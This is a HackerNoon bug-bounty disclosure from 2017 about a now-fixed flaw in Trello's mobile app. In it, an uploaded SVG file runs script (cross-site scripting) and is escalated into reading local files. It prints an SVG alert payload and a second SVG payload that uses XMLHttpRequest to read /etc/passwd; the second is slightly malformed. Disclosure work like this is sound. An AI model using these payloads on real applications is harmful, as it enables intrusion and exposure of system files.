Cross-Site Scripting to Local File Inclusion on Trello’s App

Written by ajdumanhug | Published 2017/11/28
Tech Story Tags: trello | hackerone | bug-bounty | lfi

TLDRvia the TL;DR App

Report Status: Fixed

Trello is a collaboration tool that organizes your projects into boards. In one glance, Trello tells you what’s being worked on, who’s working on what, and where something is in a process.

They launched their Bug Bounty Program on February 2nd, 2015. They pay bounties in exchange for a valid bug starting from $256 up to $4096, depending on the severity of the bug.

Vulnerability

Trello allows its users to upload a file through their mobile application. By observing how does the upload feature work, I noticed that some file types executes directly on the Trello app.

Exploitation

I created a file with .svg file extension containing a malicious script that will execute once accessed or opened.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.location);</script></svg>

After uploading the file above on Trello’s app, I successfully executed a simple Cross-Site Scripting.

Cross-Site Scripting on Trello

Then, I noticed that the file was not just uploaded in their third party service storage but it was also uploaded locally. That is why I quickly remembered that it was possible to perform a Local File Inclusion.

So, I created another payload inside the .svg file that will locate, access, and execute the /etc/passwd file.

<?xml version=”1.0" encoding=”UTF-8" standalone=”yes”?><svg xmlns=”http://www.w3.org/2000/svg"><script>function readTextFile(file){var rawFile = new XMLHttpRequest();rawFile.open(“GET”, file, false);rawFile.onreadystatechange = function (){

  if(rawFile.readyState === 4){  
     if(rawFile.status === 200 || rawFile.status == 0){  
        var allText = rawFile.responseText;  
        alert(allText);  
     }  
  }  
    
 rawFile.send(null);

readTextFile(“file:///../../../../../../../../../etc/passwd”);</script></svg>

After uploading the new .svg file, I successfully displayed the content of /etc/passwd file.

Reporting

Right after the discovery of security vulnerability, Trello triaged and fixed it in version 4.0.8.

Verifying the Fix

Shown below is the screenshot of the fix applied by Trello.

If you’d like to try bug bounty hunting or report a possible security vulnerability, you may view their Bug Bounty Program Policy on HackerOne.

Published by HackerNoon on 2017/11/28
ABOUTHow hackers start their afternoons. We publish tech stories and build publishing software.

READEntirely free library read by hundreds of millions to learn anything about any technology.

WRITEHackerNoon elevates quality technology writing far and wide across the interwebs.

PARTNERHackerNoon works directly with tech companies to place ads by content relevancy